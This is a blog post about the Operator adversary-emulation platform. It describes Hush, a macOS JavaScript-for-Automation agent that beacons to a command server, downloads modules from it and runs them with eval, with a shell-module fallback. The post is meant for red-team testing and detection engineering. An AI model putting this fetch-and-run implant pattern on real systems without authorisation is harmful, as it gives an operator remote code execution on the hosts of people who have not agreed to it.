RAM'ing agent modules with Operator
Using JXA and Operator to dynamically compose agents during an operation
Today we’re going to talk about macOS, JavaScript for Automation (JXA), and agents that dynamically compose themselves during an operation… I think that’s a cool sentence. In my blog post Keywords to the Kingdom I introduced the concept of modular implants within the Operator ecosystem, but it had some limitations. This post is about overcoming some of those limitations and creating a flexible way to “automatically compose” implants based upon decisions made by Operator’s planner.
What is JXA?
According to Apple’s documentation:
JavaScript for Automation provides the ability to use JavaScript for inter-application communication between apps in OS X.
But what does that actually mean? JXA basically enables developers to write everything from simple scripts to native macOS applications using JavaScript. If you want to read more about JXA, there is a fantastic wiki on GitHub called the JXA Cookbook that demonstrates how you can leverage JXA to build scripts and applications.
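If you've never touched JXA before, here's a tiny, harmless sketch of what it looks like to run JavaScript against the OS (this example is mine, not from the JXA Cookbook, and assumes a stock macOS install with osascript available):

    // hello.js, run with: osascript -l JavaScript hello.js
    var app = Application.currentApplication();
    app.includeStandardAdditions = true;

    // systemInfo() comes from Standard Additions and returns basic host details
    var info = app.systemInfo();
    console.log(`Hello ${info.shortUserName}, you are running macOS ${info.systemVersion}`);

That's the whole mental model: plain JavaScript, with the macOS scripting bridge (and the Objective-C bridge) available to it.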
JXA has been used for macOS agents before. Probably the most well known is Cody Thomas’ ApFell agent for the Mythic C2 framework; I highly recommend you check out his work if you want to see what a powerful JXA agent looks like.
The problem
Operator’s primary modular agent, PneumaEX, has two notable design issues (at the time of writing):
Payloads are not loaded and executed in memory (i.e. modules are dropped to disk)
Modules have to be explicitly tasked to the agent
The issues with payloads being dropped to disk are pretty self-explanatory, so we’re going to skip over that and talk about the second issue.
When I say modules have to be explicitly tasked to an agent, what I mean is that the TTPs require that I specify a module and a payload associated with that module.
Not clear? Yeah, I know :) Let’s use some examples.
Here is what a PneumaEX module TTP looks like:
    id: 2897b095-3356-456f-876c-3103f91352ab
    metadata:
      version: 1
      authors:
        - khyberspache
      tags:
        - thinktank
    name: Capture clipboard using a module
    description: |
      Installs a user-land clipboard capture binary and collects the clipboard every 30 seconds for 10 minutes.
    tactic: collection
    technique:
      id: T1115
      name: Clipboard Data
    platforms:
      darwin:
        keyword:
          command: module.collect.captureClipboard
          payload: "#{operator.payloads}/pneumaEX/collect/collect-darwin"
I’ve explicitly created a TTP where the command is module.collect.captureClipboard and it directly requires a payload, collect-darwin, as part of the TTP definition.
Right about now, you’re probably asking “why is this suboptimal or bad” (beyond the payload to disk thing)?
Well, the idea of Keyword executors in Operator is to essentially act as an interface to an agent’s implementation of a Keyword. Ideally that TTP definition would look more like this:
    platforms:
      darwin:
        keyword:
          command: collect.captureClipboard
The difference here is that now any agent can implement a collect.captureClipboard keyword using any methodology, whether that’s building the function directly into the agent OR calling a module.
Bottom line, I want to push implementation down to an agent itself and allow the TTP to act as the interface to those implementations.
Okay so I kinda get it, what does it look like?
In another blog I wrote, See Sharp (and more) in Operator, I provide an example of adding built-in functionality to Pneuma or PneumaEX using this keyword structure:
    platforms:
      windows:
        keyword:
          command: api.ps
As a quick summary of what I discuss in that post: we write a function called CallNativeAPI and pass it “ps” as an argument to call a function that we’ve written in Pneuma or PneumaEX. The agent receives the message, splits it, and jumps down the CallNativeAPI code path:
    if executor == "keyword" {
        task := splitMessage(message, '.')
        if task[0] == "api" {
            return CallNativeAPI(task[1])
        } else if task[0] == "config" {
            return updateConfiguration(task[1], agent)
        }
        return "Keyword selected not available for agent", 0, 0
    }
Then we have platform-specific implementations of the “ps” keyword inside of Pneuma and PneumaEX:
    package commands

    import (
        "encoding/json"
        "log"
        "os"
        "syscall"
        "unsafe"
    )

    func CallNativeAPI(task string) (string, int, int) {
        switch task {
        case "ps":
            log.Print("Running Task")
            return getProcesses()
        }
        return "not implemented", 1, os.Getpid()
    }
But nothing is stopping us from making the api.ps Keyword executor implementation in Pneuma a module. So instead of it being built-in functionality, and instead of manually specifying in the TTP that it should be a module, we just implement it as a module.
Enter Hush agent
Our newest macOS JXA agent does exactly what’s described above. Hush is a very simple script that consists of just five functions:
InstallModule - Request a module and install it
RunModule - Run a module
ExecuteTask - Break out instruction parameters and send them to HandleTask
HandleTask - Run a module based upon the requested executor
Run - Agent’s entry point and event loop
That’s it - it doesn’t have anything built-in. No C2, no executors to run TTPs, no malicious code. It’s just a wrapper that receives instructions then figures out whether it needs to resolve and install a module based upon the instruction.
I promise we will loop back around to the api.ps keyword, but first let’s look at the main agent event loop to get an understanding of how the module resolution works:
    function run(argv) {
        beacon = new Beacon((argv.length > 0) ? (argv[0] || argv) : 'http://localhost:3391', (argv.length > 1) ? argv[1] : 'http');
        while (true) {
            try {
                let tasks = runModule('c2', beacon.contact, {beacon: beacon});
                beacon.Links = tasks.map(task => executeTask(Object.assign(new Instruction(), task, {Pid: beacon.pid})));
            } catch (e) {
                console.log(`Beacon failed. ${e}`);
            }
            console.log(`Sleeping for ${beacon.Sleep} seconds`);
            delay(beacon.Sleep);
        }
    }
When the agent starts, we create a Beacon object that contains agent environment data and then run a module to get tasks for the agent to execute using runModule('c2', beacon.contact, {beacon: beacon}).
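For reference, here is a minimal sketch of what that Beacon object might carry, inferred only from the properties the loop above touches; the real Hush Beacon holds more environment data, and the field names beyond those shown are my assumptions:

    // Hypothetical sketch of the Beacon object, based on the run() loop above
    ObjC.import('Foundation');

    class Beacon {
        constructor(location, contact) {
            this.Location = location;                                 // Operator URL passed via argv
            this.contact = contact;                                   // C2 module name, e.g. 'http'
            this.pid = $.NSProcessInfo.processInfo.processIdentifier; // agent process id
            this.Sleep = 60;                                          // seconds between beacons (assumed default)
            this.Links = [];                                          // results of executed instructions
        }
    }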
Looking at the default command line arguments to the agent, HTTP is the default “contact” so we are going to try to run an HTTP module to collect tasks. But Hush doesn’t have a C2 module! It doesn’t have any modules. At the top of the script we have:
let module = {};
So what will happen is runModule will realize there is no “module.c2.http” object available in the agent and make an HTTP/S request to Operator for an “http.js” module. Once that module is installed, the module itself contains all of the logic necessary to send a Beacon to Operator and request instructions to execute.
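Conceptually, the lazy resolution behaves like the sketch below. This is not Hush’s literal code: the fetchModule helper and the exact registry layout are my assumptions, but the shape matches the behavior described above.

    // Conceptual sketch of dynamic module resolution (not Hush's exact implementation).
    // fetchModule() is a placeholder for an HTTP/S request to Operator for <name>.js.
    function installModule(category, name) {
        let source = fetchModule(`${name}.js`);    // pull the module source from Operator
        module[category] = module[category] || {};
        eval(source);                              // the fetched script registers module[category][name]
    }

    function runModule(category, name, args) {
        if (!module[category] || !module[category][name]) {
            installModule(category, name);         // only fetch and install when missing
        }
        return module[category][name](args);       // subsequent calls hit the cached module
    }

Every call after the first reuses the installed module, so the fetch only happens once per module per agent run.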
Whew.
Brief pause.
Now, time for the api.ps implementation.
Looking at that function, we see that if the C2 module resolves any tasks, we are going to map each task to the executeTask function. Nothing particularly interesting happens in that function, as it primarily sets up the task for the handleTask function.
Pneuma’s implementation of api.ps required that we explicitly handle both parts of the keyword (api and ps) using switch statements in the code, in addition to actually having the underlying function (getProcesses()) implemented.
Hush doesn’t do anything like that; instead, Hush implements it as a module:
    if (task[0] === 'api') {
        if (task[2]) {
            try {
                task[2] = JSON.parse(task[2]);
            } catch (e) {
                throw new Error("Could not parse module params: " + e.toString());
            }
        }
        return runModule(task[0], task[1], task[2] || null);
    }
    return runModule('shell', link.Executor, {task: link.Request});
When Hush receives an api task, it’s going to try to run that module, which, as we’ve already seen, will dynamically resolve, install, and run the module. So for api.ps, Hush will check whether module.api.ps exists; if not, it will request ps.js from Operator and run the module.
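I won’t reproduce the real ps.js here, but a hypothetical module in this style might register itself on the global module object something like the sketch below. The registration shape and the NSWorkspace approach are my assumptions (and NSWorkspace only sees GUI applications), but it shows the idea of a module that plugs into the registry Hush resolves against:

    // Hypothetical ps.js, illustrative only; not the module Operator actually ships.
    ObjC.import('AppKit');

    module.api = module.api || {};
    module.api.ps = function () {
        // Enumerate running GUI applications through a native API instead of spawning `ps`
        let apps = $.NSWorkspace.sharedWorkspace.runningApplications;
        let results = [];
        for (let i = 0; i < apps.count; i++) {
            let app = apps.objectAtIndex(i);
            results.push({
                pid: app.processIdentifier,
                name: ObjC.unwrap(app.localizedName)
            });
        }
        return JSON.stringify(results);
    };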
At the bottom of that function, we can also see that if a task doesn’t match the keyword, it’s just going to try and run it using a shell module (module.shell.sh). This same structure also allows us to swap C2 modules on the fly.
Wrapping up
What has this done for us? We can decrease the number of TTPs that we store inside Operator and instead push some of the implementation complexity down to agents themselves. This has the added benefit of allowing engineers to test various implementations of a TTP in different agents. In this case, someone using Operator could try running the api.ps TTP on a macOS system using Hush and PneumaEX and have two completely different methodologies to test for their detection engineering.
I hope this introduces you to something new about Operator and gives you ideas for how you could implement new agents :)